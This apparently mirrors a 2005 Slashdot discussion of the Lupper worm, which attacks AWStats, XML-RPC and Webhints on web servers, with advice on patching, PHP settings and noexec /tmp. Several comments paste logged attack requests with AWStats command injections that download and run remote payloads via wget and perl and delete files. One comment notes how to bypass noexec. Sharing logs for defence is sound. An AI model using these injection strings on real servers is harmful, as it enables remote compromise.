Slashdot Mirror
Linux Lupper.Worm In the WIld
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
It doesn't say what software it tries to exploit but it does say which scripts. I'd post them here but it would be a waste of space; they're about halfway down on the McAfee page.
I'd say if your website has one of those scripts I'd look into updating or removing whatever software it is that has the vulnerability.
It's better to vote for what you want and not get it than to vote for what you don't want and get it.
- E. Debs
Athletic Scholarships to universities make as much sense as academic scholarships to sports teams.
Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).
Bradley Holt
So here is some, shamelessly cribbed from e-week. The worm actually attemts to attack three different web services:
"The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.
AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.
Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "
This still does not tell me which blogging/wiki programs are affected, only theat "most" have fixes - more info, anyone?
Using plain ol' text since 1968
I just noticed this today, and from what I've heard here it sounds a likely candidate. IP addresses obscured for politeness.
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd %20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3b chmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e19 3%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET
193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET
193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET
.
.
.
193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST
193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST
193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST
.
.
.
For 60 hits.
Security Focus eWeek CNet
One line blog. I hear that they're called Twitters now.
a decent description can be found here http://isc.sans.org/diary.php?storyid=823
Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).
According to this article, AWStats was patched back in February.
...Rob
The American Dream isn't an SUV and a house in the suburbs; it's Don't Tread On Me.
From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.
/tmp.
Apche usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in
Damned slashdot eats my code examples. Re-post.
It's Not configuration of apache, but configuration of PHP. Basically, it's whether you allow the following:
[?php
$foo = `ls`;
$bar = include("http://foo.com/example.txt");
?]
A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful for hacking stuff together).
#2 is just plain dumb.
I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least), it's possible that they don't allow "http://" (remote file protocols) by default in their later releases.
--Robert
...then it's a PHP/*nix worm, not Linux specifically.
Not exactly. From what I understood, there are BSD and Linux variants : both versions are using the same PHP holes, but the binary itself must be Linux or BSD compatible.
There's a layer available in BSD that allows to run Linux binaries natively, so Linux potentially could infect a BSD system, but it is somewhat like saying an MS-Windows virus could infect a Linux through wine.
Oh, and while we're at it, aren't these virii more specifically Linux/i386 and BSD/i386 virii ?
I have discovered a truly marvelous proof of killer sig, which this margin is too narrow to contain.
I checked my logs and found the following: /stats/awstats/awstats.pl?configdir=|echo%20;cd%20 /tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20membe rs.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm% 20-rf%20a.txt*;echo| HTTP/1.1" 404 1030 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
[06/Nov/2005:18:13:39 -0500] "GET
Why not get somebody to shut down members.lycos.co.uk/sugi/a.txt??
Well, as of 9:30 AM central time 24.224.174.18 isn't accepting connections, so it's either been slashdotted or taken down.
My web server logs for my home machine are full of attempts to exploit these holes, coming from a large number of IP addresses.
This indicates that this is indeed in the wild, and active, and spreading.
Thus, it is not alarmist shit.
a noexec /tmp doesn't protect from running an interpreter with the script source in /tmp. Next version should simply include '/bin/sh /tmp/listen' instead to be fully functional.
I'll step in just for giggles: Category Error
Stating on Slashdot that I like cheese since 1997.
YOu need to link to that page from the original virus description... then it works fine.
man, I feel like mold.
Um, AWStats isn't written in PHP, but in Perl. This isn't a PHP worm, it's a CGI exploit which happens to target PHP apps, plus the occasional Perl app.
Need a Linux consultant in New Orleans?
Per Making /tmp non-executable:
What you need is defense in depth. Mounting /tmp noexec,nosuid helps; Keeping everything up-to-date helps; Scanning your log files, following the news,... You get the idea.
And of course, hiring someone competent to do all this is a fine idea;)
Mounting tmp noexec won't stop scripts like this.
Aside from keeping a system patched up, it's important on a web server to lock down all programs that aren't necessary for the operation of your web services. In typical setups there is absolutely no reason that the apache user should have to execute wget, although it will be able to by default.